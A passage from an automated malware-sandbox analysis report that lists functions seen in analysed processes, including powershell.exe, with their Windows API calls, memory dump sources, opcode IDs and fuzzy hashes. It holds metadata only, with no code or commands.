                                                                                            • Opcode Fuzzy Hash: 0c6364687da2c657c71ad30d80f395dd2e215c9a8655a74977f0cd57ba5ff7f6
                                                                                            • Instruction Fuzzy Hash: A0F0A935504740DFEB209F4AD889769FBA0EF04621F08C09ADD494B752E3B5E808CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01D7AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 938d10ece66de6a705aa43d74509693c9761c8fb700bdc313c4249592b403266
                                                                                            • Instruction ID: 1be5ba4a3e838877b7e5fb82c8b1c6682ad07b62287a0c8a16224ba5159c9a70
                                                                                            • Opcode Fuzzy Hash: 938d10ece66de6a705aa43d74509693c9761c8fb700bdc313c4249592b403266
                                                                                            • Instruction Fuzzy Hash: D0F0CD31504740CFEB11EF09D989766FBA0EF04621F08C0AADD494F742E278E504CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01D7A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 2424116a148bb2bcae510e7167ccc14dd64cb75214c37224a21f95bdfc1eb2b2
                                                                                            • Instruction ID: 2c642acc3fafa8d79e7e4144f282d0ae54e166655848df41ce24c29d78015e17
                                                                                            • Opcode Fuzzy Hash: 2424116a148bb2bcae510e7167ccc14dd64cb75214c37224a21f95bdfc1eb2b2
                                                                                            • Instruction Fuzzy Hash: 6D1191715093809FD712CB25DC49B96BFA4EF06220F0980ABED458B253E275A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D7A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01D7A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153849273.0000000001D7A000.00000040.00000001.sdmp, Offset: 01D7A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 8c56333c53779ddaec01ccc7ac6b9fdef4aa6d2cae8723375fce27e88b2d9833
                                                                                            • Instruction ID: 2311137a69c8a740b4744ef0ce4ecb655fcffdfac99a0be6b1fe460d1ccb0cad
                                                                                            • Opcode Fuzzy Hash: 8c56333c53779ddaec01ccc7ac6b9fdef4aa6d2cae8723375fce27e88b2d9833
                                                                                            • Instruction Fuzzy Hash: 2D01FD75604740CFEB10DF29DC897AAFBA4EF04220F48C0ABDC098B642E375E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 029C07F7, Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2165486445.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: acfa9c32b74e45ac5cf96f81b5ddabe09d17a3ab17b05d9d8ec09e77bdf2653b
                                                                                            • Instruction ID: bf0c6d8cac090c1a4cec792fec5e13929d065df9ac91bbafb05ff7da00972c4c
                                                                                            • Opcode Fuzzy Hash: acfa9c32b74e45ac5cf96f81b5ddabe09d17a3ab17b05d9d8ec09e77bdf2653b
                                                                                            • Instruction Fuzzy Hash: 8E0186B65093809FD712CB15AC44862FFB8EF86660759C09FEC898B612D225A909CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02B70862, Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2165979370.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9652a5264ec91fad34b9109e716eb977590a957d87a4191f86068ebd2e3b64e2
                                                                                            • Instruction ID: b578118460785ac140ab668b0de2e7fc46a9f0c563851f6fbd42c2e80b2de0b0
                                                                                            • Opcode Fuzzy Hash: 9652a5264ec91fad34b9109e716eb977590a957d87a4191f86068ebd2e3b64e2
                                                                                            • Instruction Fuzzy Hash: 33F0ED2221E3E05FC707533868A9999BF729E8712034E42DBD491CF1E7DA882C09D3A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 029C081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2165486445.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1509de50876a4029b424828327464e3ab662e5f9b8e15c4aaa20faa8a1d3d99
                                                                                            • Instruction ID: 1839a9bf29e0354e661b1c6cbaba7863548edd85fc3aaa5f2ac666c143eb3644
                                                                                            • Opcode Fuzzy Hash: a1509de50876a4029b424828327464e3ab662e5f9b8e15c4aaa20faa8a1d3d99
                                                                                            • Instruction Fuzzy Hash: 38E092766057008BDB50CF0AEC41452F7D4EB84A30B18C07FDC0D8B701E235B504CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D723F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153814311.0000000001D72000.00000040.00000001.sdmp, Offset: 01D72000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 223aeee6ccf80654908f486972af5e87134ead6b54452a189386603ec5f05e86
                                                                                            • Instruction ID: de9833a5ef6a12b543fe9d9c262ae0965f304cabae1bbe223de192fa545391e9
                                                                                            • Opcode Fuzzy Hash: 223aeee6ccf80654908f486972af5e87134ead6b54452a189386603ec5f05e86
                                                                                            • Instruction Fuzzy Hash: 6ED05E79204AC18FE7168A1CC1A5B953BA4AF69B08F4644F9E840CB6A3C768E581D200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D723BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000019.00000002.2153814311.0000000001D72000.00000040.00000001.sdmp, Offset: 01D72000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 64543651597036a138cb9bb25b31cd9db4aee4b4ed1e840186cc384d27be41f0
                                                                                            • Instruction ID: f3748a5658a075fc83f770facba688b4df4385b418b73d5cb7e82b7869e9942a
                                                                                            • Opcode Fuzzy Hash: 64543651597036a138cb9bb25b31cd9db4aee4b4ed1e840186cc384d27be41f0
                                                                                            • Instruction Fuzzy Hash: 16D05E343006818FEB15CA1CC194F5977E4AF44700F0644ECBC008B666C3A5E880C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2516 Parent PID: 2900 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01D0ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: a1b6087efb4487da71f2709b5acefc84392435b27e9f757f973ea918402fd548
                                                                                            • Instruction ID: 8d68bb79fb8b4f044539bb59a7d33b050181b805d568d095c67c9d4fb1aef342
                                                                                            • Opcode Fuzzy Hash: a1b6087efb4487da71f2709b5acefc84392435b27e9f757f973ea918402fd548
                                                                                            • Instruction Fuzzy Hash: DD21D3755097809FEB138F25DC44B92BFB4EF06310F0984DAE9858B5A3E231D908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 248ea9d9d53c3683fe4d2b053c210fac7c973a3cea83e9140e4139db1cd8960c
                                                                                            • Instruction ID: fd42f221fe89b891aadc755adf093fb902c3bbe16bfdefc2ecc90f2f64dc6cd8
                                                                                            • Opcode Fuzzy Hash: 248ea9d9d53c3683fe4d2b053c210fac7c973a3cea83e9140e4139db1cd8960c
                                                                                            • Instruction Fuzzy Hash: 03115E76500704DFEB21CF59D884B96FBE4EF08221F08C4AAED498B662E375E414DB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 80afbadd9ac816fb2525f737f19fca336a9a26e2b2777729ddb51c6a3e21b3cf
                                                                                            • Instruction ID: baa41e4b2bdeacf347ea7cae7757d17176292853d66ec270e260251b50519fce
                                                                                            • Opcode Fuzzy Hash: 80afbadd9ac816fb2525f737f19fca336a9a26e2b2777729ddb51c6a3e21b3cf
                                                                                            • Instruction Fuzzy Hash: 1811A075509380AFDB228F15DC45F52FFB4EF06220F09849AED854B663D275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 4fcab218060252e2f7183c47cda1ef4da17d267f9305952db88f90eb5171efdb
                                                                                            • Instruction ID: 164aa80149f9d4d31e0c26a056c404e9202284d6086bbd989613f11fb21ab399
                                                                                            • Opcode Fuzzy Hash: 4fcab218060252e2f7183c47cda1ef4da17d267f9305952db88f90eb5171efdb
                                                                                            • Instruction Fuzzy Hash: C201AD35404700DFEB22CF49D885B21FBA0EF08720F18C09ADD890B656D375E418DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 01F401D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 30328acdef7604ddfac1aef677dd644969b6bea7658be52808d13526cad4e866
                                                                                            • Instruction ID: 2602087f76be4135ac7fe0b4f49db2388bcdb00740c408ea4088e5179053a36f
                                                                                            • Opcode Fuzzy Hash: 30328acdef7604ddfac1aef677dd644969b6bea7658be52808d13526cad4e866
                                                                                            • Instruction Fuzzy Hash: 7931376650E3C08FE7138B759C65692BFB4AF43310F0E84DBD984CF1A3D6299909DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F4067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01F4072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: f97d3030e028f54278f1d50607ac8f1ce69a0761b38a0d1141261ad441853402
                                                                                            • Instruction ID: 76c2e55ab2ad1da2a4657eb2ba0759e09f4ab3e0c72037cf61dbbff6f9bcbcad
                                                                                            • Opcode Fuzzy Hash: f97d3030e028f54278f1d50607ac8f1ce69a0761b38a0d1141261ad441853402
                                                                                            • Instruction Fuzzy Hash: F4315271505340AFE722CF65DC45F96BFF8EF05210F09849EE9858B293D765E908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 01F40DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: f6f910c5e1910a9d063901b2dfbe7ddaf1904f5a53d3012ab0bbb9ef9d614d13
                                                                                            • Instruction ID: f0f21df3c4a753e2780be42436779ce133d3a241505b364cbff2f6ef6b0cf384
                                                                                            • Opcode Fuzzy Hash: f6f910c5e1910a9d063901b2dfbe7ddaf1904f5a53d3012ab0bbb9ef9d614d13
                                                                                            • Instruction Fuzzy Hash: 26318671509380AFE722CB25DC45B96BFE8DF06214F1884AAE984CF293D679E909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: d75643e809a378541624c0ae338e398ac5210163d92575463ded5eb55ff6281f
                                                                                            • Instruction ID: 9fb992a16beb1a4ccfb3f61206c2587bb60d14c9289208e3cd67149bf7f0045a
                                                                                            • Opcode Fuzzy Hash: d75643e809a378541624c0ae338e398ac5210163d92575463ded5eb55ff6281f
                                                                                            • Instruction Fuzzy Hash: 5931B172009380AFE722CB60DC45F96BFB8EF06310F0884DBE985DB193D224A908C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 619a538b5305acdeee24f1045fac743c7395b3812b7f0810ec8d57448bd5fc5b
                                                                                            • Instruction ID: 47309de1559092fb2aded8e81a3b0bd7d7a83c421b06d5d5e8bbcae25ab25bf7
                                                                                            • Opcode Fuzzy Hash: 619a538b5305acdeee24f1045fac743c7395b3812b7f0810ec8d57448bd5fc5b
                                                                                            • Instruction Fuzzy Hash: 3321D2B2509380AFE713CB60DC45B96BFB8EF06320F0884DBE984DB193D225A909C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01F4109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 9bbb4f7d9f8d8dc3bae5c9057e9171eaf9409bd1ac190cc3da3372b0c63728fa
                                                                                            • Instruction ID: 3d9e6c63f0707b4425d040ea09e4e7730b866f15a275d69a05599ed838b1f6a7
                                                                                            • Opcode Fuzzy Hash: 9bbb4f7d9f8d8dc3bae5c9057e9171eaf9409bd1ac190cc3da3372b0c63728fa
                                                                                            • Instruction Fuzzy Hash: C7316F7550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 65c2d9580ba120eab3201eca442894038fac756813494c7e4cdd382fff72842d
                                                                                            • Instruction ID: 3b292d66661ea9f4db5ab908c73b944979a2eb60dc73758923af82bd934ad690
                                                                                            • Opcode Fuzzy Hash: 65c2d9580ba120eab3201eca442894038fac756813494c7e4cdd382fff72842d
                                                                                            • Instruction Fuzzy Hash: 2921A375509380AFE722CF15DC45FA6BFB8EF06220F08849BE945DB192D664E908CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1129996299-0
                                                                                            • Opcode ID: 8802da857bfeca4d4818fa5b077736fe3dc540c8cc5b47afc564aec2bc386fcd
                                                                                            • Instruction ID: 095def494c8d90d680e57013c6ef79e15053380778cde2e37a3d735fbf2d84ba
                                                                                            • Opcode Fuzzy Hash: 8802da857bfeca4d4818fa5b077736fe3dc540c8cc5b47afc564aec2bc386fcd
                                                                                            • Instruction Fuzzy Hash: DB21A77140D3C06FD3128B258C55B66BFB4EF47620F1981DBD8848F693D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01F40819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 98b84f03d2b4e05fc364cca53fb9575241e4f8eadd57a2c14df2dcb695733cb0
                                                                                            • Instruction ID: 2b9beda31700cbbc8e2efb4bc520d9f3b8857cac526dc0b917e6e3abcede5c0a
                                                                                            • Opcode Fuzzy Hash: 98b84f03d2b4e05fc364cca53fb9575241e4f8eadd57a2c14df2dcb695733cb0
                                                                                            • Instruction Fuzzy Hash: 49210A76408780AFE712CB259C41FA3BFA8EF46720F1881DBF9848B193D224A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01F40502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 12f6f397951e01e541873f2bb19eb8fb3dd2ea93ab15d75802ff312400350724
                                                                                            • Instruction ID: 18b5f1b1aed240da1863230987791d69f94eb6d891774cefac1b41ae1c1c600b
                                                                                            • Opcode Fuzzy Hash: 12f6f397951e01e541873f2bb19eb8fb3dd2ea93ab15d75802ff312400350724
                                                                                            • Instruction Fuzzy Hash: D6217F7540E3C0AFD3128B759C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01F4072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: a96f9b779257e3d02d1f57cd34abdaff5167d94c5106e7e6d59e2510eba32610
                                                                                            • Instruction ID: b96ae3b13157e254a1204329fcd949b2ebc43b85e210681e2ebb47db785913a9
                                                                                            • Opcode Fuzzy Hash: a96f9b779257e3d02d1f57cd34abdaff5167d94c5106e7e6d59e2510eba32610
                                                                                            • Instruction Fuzzy Hash: 5B21A171500300EFE721DF65CC85FA6FBE8EF08310F04846AEA498B292D735E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01F408E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: bd12714c2234e228a4b3dcbb9eec37013ecbc4f4294e5aee73c04d5456696de6
                                                                                            • Instruction ID: 030cf93c1f0d7cb71712960fdfb0f6332b2df4d5b4bf94c15bcdd6d76029f1f0
                                                                                            • Opcode Fuzzy Hash: bd12714c2234e228a4b3dcbb9eec37013ecbc4f4294e5aee73c04d5456696de6
                                                                                            • Instruction Fuzzy Hash: 6321B271409380AFE722CF50DC45F96BFB8EF06310F0984DBE9458B153C225A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: bd0bc3e1ee9d701aec8ebee2a70c6b06a75a888d90b6cdd0bd3a79d0e6431743
                                                                                            • Instruction ID: 4571cea3061ca77e82f2b7b97f19abfe86b4d4f651b3d8b8b1ce328cf76ca646
                                                                                            • Opcode Fuzzy Hash: bd0bc3e1ee9d701aec8ebee2a70c6b06a75a888d90b6cdd0bd3a79d0e6431743
                                                                                            • Instruction Fuzzy Hash: 3821A77540D780AFD3138B25DC51B62BFB8EF87710F1981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 01F40DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: b72f18bb888f1f7b9989f180efebc5e48e5793a97dcad5bf04c42e55126ee333
                                                                                            • Instruction ID: ca22a8f160d58c636ed69ec6e253c87d932d9c0b9cbe71f0a44d99da0a230235
                                                                                            • Opcode Fuzzy Hash: b72f18bb888f1f7b9989f180efebc5e48e5793a97dcad5bf04c42e55126ee333
                                                                                            • Instruction Fuzzy Hash: E1218171504240EFF721DF69DC85BAAFBE8EF04650F14846AE948DB282EA75E904CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 31487c21d4c9f74c445ab0c1c2691cff81989b8ef2ffaea1e71097cc3f18d2a3
                                                                                            • Instruction ID: a146001ee9ca516ab1bfed65d0543dc007ad0922f0cf8f1f9a7dbf2f4e07e46c
                                                                                            • Opcode Fuzzy Hash: 31487c21d4c9f74c445ab0c1c2691cff81989b8ef2ffaea1e71097cc3f18d2a3
                                                                                            • Instruction Fuzzy Hash: 8611AF76504304EFEB22CF65DC85FAAFBACEF04320F14856AF945DA281D674E9448BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: b85545414aad17a0829d71abb17258827ba5437a42209b5dda4e70e13e304e8e
                                                                                            • Instruction ID: 5b8e808129db08809cffb2e44bb87626c894125987a04a21fc25aca2644b0253
                                                                                            • Opcode Fuzzy Hash: b85545414aad17a0829d71abb17258827ba5437a42209b5dda4e70e13e304e8e
